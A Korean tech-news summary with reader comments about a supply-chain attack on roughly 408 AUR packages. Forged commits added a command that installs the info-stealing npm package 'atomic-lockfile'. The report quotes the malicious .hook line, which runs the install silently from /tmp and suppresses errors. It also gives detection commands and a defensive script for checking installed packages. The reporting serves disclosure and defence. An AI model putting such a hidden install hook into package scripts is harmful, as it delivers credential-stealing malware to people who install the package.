# 수백 개 AUR 패키지가 정보 탈취 악성코드 공격을 받음

> Clean Markdown view of GeekNews topic #30407. Use the original source for factual precision when an external source URL is present.

## Metadata

- GeekNews HTML: [https://news.hada.io/topic?id=30407](https://news.hada.io/topic?id=30407)
- GeekNews Markdown: [https://news.hada.io/topic/30407.md](https://news.hada.io/topic/30407.md)
- Type: GN+
- Author: [neo](https://news.hada.io/@neo)
- Published: 2026-06-12T09:01:48+09:00
- Updated: 2026-06-12T09:01:48+09:00
- Original source: [lists.archlinux.org](https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/)
- Points: 1
- Comments: 1

## Topic Body

- AUR(Arch User Repository)에 다수의 **악성 커밋**이 삽입돼, 패키지 설치 과정에서 `npm install atomic-lockfile`을 실행하도록 변조된 **공급망 공격** 발생  
- 읽기 전용 미러 검색 결과, **약 408개 패키지**의 PKGBUILD·`.install`·`.hook` 파일에서 동일한 악성 명령 확인  
- 악성 커밋은 **직전 커밋의 이름·이메일을 도용**해 정상 메인테이너를 사칭하는 **커밋 위조** 방식이며, 계정 탈취 여부와 별개  
- Arch 측은 **악성 커밋 초기화·삭제** 및 **계정 차단**을 진행 중이며, 추가 악성 패키지는 하나의 스레드로 모아 신고 요청  
- 커뮤니티 구성원들이 개별 패키지 커밋을 잇따라 신고하며 **협력적 대응** 진행, AUR 패키지 생태계 전반에 영향을 미치는 대규모 사안임  
  
---  
  
### 사건 개요 및 대응 요청  
- AUR에 악성 커밋이 대량 삽입된 정황이 공유되며, **악성 커밋 초기화/삭제 및 계정 차단** 작업이 진행 중  
- 추가 악성 패키지 발견 시, 동일 스레드로 모으기 위해 **이 이메일에 회신 형태로 신고**해 달라는 요청  
- 조정 담당자가 접수된 신고를 모두 확인했다고 회신했으며, 신고에 시간을 들인 참여자들에게 감사 표명  
  
### 악성 코드 패턴 — atomic-lockfile  
- 변조된 패키지들은 공통적으로 `npm install atomic-lockfile`을 실행하며, 뒤에 `ora`, `fast-glob`, `glob`, `minimist`, `axios`, `commander`, `execa`, `chalk`, `debug` 등 추가 npm 패키지명이 함께 붙음  
- 악성 명령이 위치한 파일 유형  
  - `*-deps.install` 형태의 **설치 스크립트**  
  - `*.install` 패키지 설치 스크립트  
  - `*.hook` 파일 — 예: `Exec = /bin/sh -c 'cd /tmp && npm install atomic-lockfile ... 2>/dev/null; exit 0'` 형태로 `/tmp`에서 실행 후 오류를 숨기고 종료  
  - 일부는 `install.sh` 등 관련 파일에 포함  
- 신규 생성된 악성 패키지 사례로 `exodus-wallet-bin`이 보고되었으며, 첫 커밋 기준 **약 4시간 전** 생성된 신생 패키지로 확인  
  
### 탐지 방법 및 영향 범위  
- 읽기 전용 미러를 직접 점검하는 방식으로 탐지  
  - `git clone https://github.com/archlinux/aur.git` 후, 모든 ref를 순회하며 `git grep 'atomic-lockfile'` 수행  
  - 결과로 `atomic-lockfile`을 설치하는 **약 408개 패키지**의 긴 목록 확보, 자동 정리(cleanup) 작업에 활용 가능  
- 영향받은 것으로 거론된 패키지 예시  
  - `runescape-launcher`, `oracle-bin`, `tesseract-gui`, `python-starsessions`, `bitcoin-core-git`, `apple-music-desktop`, `exodus-wallet-bin`, `anythingllm-appimage`, `arm-linux-gnueabihf-binutils` 등  
  - `cutefish-*`, `python2-*`, `python-*` 계열 등 광범위한 패키지군 포함  
- 대량 개별 신고로 메일이 많아지자, **여러 건을 한 메일로 묶어** 보내는 방식이 권장되었고, IRC에서 통합 패키지 목록이 별도 공유됨  
  
### 사칭/위조 방식  
- 특정 계정(`arojas`) 관련 패키지에 대해 **계정 탈취인지 커밋 위조인지**에 대한 의문이 제기됨  
- 이에 대해 악성 커밋은 **직전 커밋의 이름과 이메일을 사칭(impersonate)** 하는 방식이라고 확인 — 즉 커밋 메타데이터 위조  
- 동일 사용자의 다른 패키지들은 이미 수정 완료된 경우도 보고됨  
  
### 대응 현황  
- 신고된 패키지 커밋들이 순차적으로 처리되었고, 일부 항목은 **수정 완료(Done)** 회신으로 확인  
- 추가 신고가 이어지자 조정 담당자가 접수분을 일괄 확인, 진행 중인 **차단·초기화 작업**과 병행  
- 다수 참여자가 커밋 링크와 함께 개별 패키지를 신고하며 **커뮤니티 주도 협력 대응** 형태로 진행

## Comments



### Comment 59446

- Author: neo
- Created: 2026-06-12T09:01:50+09:00
- Points: 1

###### [Lobste.rs 의견들](https://lobste.rs/s/ta0sem/hundreds_aur_packages_attacked_by) 
- 이 일로 커뮤니티의 **익명·미검증 기여**에 남아 있던 신뢰가 거의 끝날 것 같음  
  신뢰가 실시간으로 깎여 나가는 걸 보는 느낌임
  - 솔직히 말하면 좋은 일이고, 이미 늦었음. 우리 업계는 이제 정신 차려야 함  
    컴퓨터에는 **개인적이고 민감한 데이터**를 너무 많이 맡기고 있고, 현대 생활의 중심이 됐음. 개인용 컴퓨터가 감염되면 그건 정말 재앙적인 사건이고, 운이 좋으면 해커가 굳이 나를 콕 집어 괴롭힐 만큼 내가 흥미롭지 않기를 바라는 정도임  
    그런데도 우리는 어째서인지 아무 랜덤 프로그램이나 **전체 권한**으로 실행하는 걸 정상화해 왔고[1], 그게 나쁜 생각으로 드러날 때마다 놀란 척함  
    [1] 현재 사용자 권한 기준임. 대부분의 설정에서 root는 [사실상 의미가 거의 없음](https://xkcd.com/1200/)
  - KDE는 [일주일 전](https://www.linux-magazine.com/Online/News/KDE-Linux-Drops-AUR)에 자체 빌드 파이프라인에서 **AUR**를 제거했는데, 아마 이 공격의 이전 버전에 대한 대응이었던 것 같음
  - AUR 패키지 검토에 **신뢰망 모델**을 적용하고, 최근 업데이트에는 냉각 기간을 결합하면 흥미로울 듯함  
    AUR 패키지를 설치하거나 업데이트할 때 이런 선택지를 주는 시스템을 상상해 봄: 최근 업데이트된 패키지라면 1주일 식을 때까지 기다리기, 직접 몇 분 들여 패키지를 검토하고 평판에 연결된 서명된 검토를 남기기, 충분한 신뢰가 쌓인 여러 다른 사람의 서명된 검토에 의존하기  
    냉각 기간은 모든 패키지를 함께 최신으로 유지한다는 Arch 정책과 기술적으로 맞지 않을 수도 있음. 하지만 AUR 패키지는 어차피 공식 지원 대상이 아니기도 함

- 몇 시간이 지났는데도 **NPM 패키지**가 아직 내려가지 않았음: https://www.npmjs.com/package/atomic-lockfile

- 설치된 패키지가 영향을 받았는지 확인하려면 `aur_pkg_list.txt` 파일과 함께 이 작은 스크립트를 쓰면 됨

  ```  
  installed_pkgs="$(yay -Qq)";  
  grep refs aur_pkg_list.txt | awk -F/ '{print $4}' | tr -d ')' \  
  | while read -r pkg; do \  
      echo "$installed_pkgs" | grep "^$pkg\$"; \  
  done  
  ```

  세미콜론을 넣어뒀으니 한 줄 명령으로 만들기 쉬움 :-)
  - 부분 문자열까지 잡는 것 같음. 예를 들어 `ktea`가 `kteatime`에도 매칭됨  
    이 버전은 동작하는 듯함

    ```  
    grep refs aur_pkg_list.txt | awk -F/ '{print $4}' | tr -d ')' | while read -r pkg; do  
       echo "$installed_pkgs" | grep "^$pkg\$";  
    done  
    ```

- 이 일이 꽤 전부터 진행됐을 수도 있음. [18일 전 이 이메일](https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/MLIJANLZQNLFKK5Q2QVNJPWP2DM6KK6M/)을 보면 비슷한 **악성 페이로드**가 쓰인 듯한데, 악성 커밋은 저장소에서 아예 제거된 것 같음

- 관련해서, 인기 있는 Linux 배포판들의 **공급망 보안 태세**를 잘 비교한 자료가 있을까? 지금까지 찾은 글 대부분은 은근한 마케팅이거나 AI가 만든 허접한 글처럼 보였음. 그냥 직접 조사해야 할지도 모르겠음  
  우울한 부분은 커뮤니티 개발의 이상을 좋아하면서도, 공급망 걱정 때문에 폐쇄적인 선택지나 심지어 독점 소프트웨어 쪽을 더 자세히 보게 된다는 점임